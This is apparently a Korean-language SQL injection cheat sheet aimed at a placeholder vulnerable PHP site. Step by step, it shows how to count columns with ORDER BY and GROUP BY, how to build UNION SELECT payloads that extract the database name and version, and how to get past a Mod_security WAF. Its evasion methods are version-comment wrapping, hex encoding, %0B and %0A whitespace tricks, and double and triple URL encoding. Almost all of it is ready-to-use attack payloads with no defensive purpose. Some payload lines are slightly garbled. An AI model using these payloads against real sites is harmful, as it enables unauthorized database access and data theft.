[~]Error page case[~]
# 500 Internal Server Error
# 400 Bad Request
# 403 Forbidden Error
# 406 Not Acceptable
# 404 Not Found


[~]500 Internal Server Error Bypass[~]

정상적인 페이지
http://취약한 사이트.in/index.php?ID=228

오류도출을 위한 싱글쿼터
http://취약한 사이트.in/index.php?ID=228' <-error

많은 값의 칼럼을 넣어보고 에러 도출
http://취약한 사이트.in/index.php?ID=228 order by 100-- -
error

if(!원하는 에러)

주석 바꾸기
http://취약한 사이트.in/index.php?ID=228 order by 100-- -

order by를 통한 에러도출이 안먹힐 경우
http://취약한 사이트.in/index.php?ID=228 group by 1-- 정상적인 페이지

http://취약한 사이트.in/index.php?ID=228 group by 80-- no error

http://취약한 사이트.in/index.php?ID=228 group by 85-- 500 Internal server error

총 칼럼 수 80

http://취약한 사이트.in/index.php?ID=228+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76
,77,78,79,80--

/*Not Acceptable -> Mod_security Firewall(WAF) :(*/

http://취약한 사이트.in/index.php?ID=228+/*50000union*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76
,77,78,79,80--

/*Bypass*/

[~]# 400 Bad Request Error Bypass[~]

정상적인 페이지
http://취약한 사이트.in/index.php?ID=75

오류도출을 위한 싱글 쿼터
http://취약한 사이트.in/index.php?ID=75' <-error

칼럼수 찾기
http://취약한 사이트.in/index.php?ID=75' order by 100-- <-error
http://취약한 사이트.in/index.php?ID=75' order by 30--
http://취약한 사이트.in/index.php?ID=75' order by 25--  <-no error

취약한 컬럼 찾기
http://취약한 사이트.in/index.php?ID=75'+UNION+ALL+SELECT+1,2
,3,4,5,6,7,8.9,,10,11,12,13,concat(DATABASE(),VERSION()),15,16,17,18,19,20,21,22,23,24,25-- <-error

http://취약한 사이트.in/index.php?ID=75'+UNION+ALL+SELECT+1,2
,3,4,5,6,7,8.9,,10,11,12,13,concat(0x444154414241534528292C56455253494F4E2829),15,16,17,18,19,20,21,22,23,24,25-- <-error

http://취약한 사이트.in/index.php?ID=75'+UNION+ALL+SELECT+1,2
,3,4,5,6,7,8.9,,10,11,12,13,concat/**/(0x444154414241534528292C56455253494F4E2829),15,16,17,18,19,20,21,22,23,24,25-- <-error

http://취약한 사이트.in/index.php?ID=75'+UNION+ALL+SELECT+1,2
,3,4,5,6,7,8.9,,10,11,12,13,concat%0B(0x444154414241534528292C56455253494F4E2829),15,16,17,18,19,20,21,22,23,24,25-- <-no error

ADD %0B between concat and (), also us %0A

[~]Bypass Trick & Tip[~]
# Mod_security Bypass

URL Encoding --> ' => %27

Double URL Encoding --> %2527 => %27 => '
Triple URL Encoding --> %252525 => %2527 => 27 => '

# space Bypass
Using + instead of .. inline comments /**/ instead of // inline comments and URL Encoding instead of ..

Using combination inline comments, URL Encoding & junk Characters

    Order/%2a[junkCharacters]%2a/by/%2a[junkCharacters]%2a/1

while space Characters %0a, %0b, %0c, %0d, %a0, %09, %0a

    Order%0aby%0a1
    Order%0D%0Aby%0D%0A1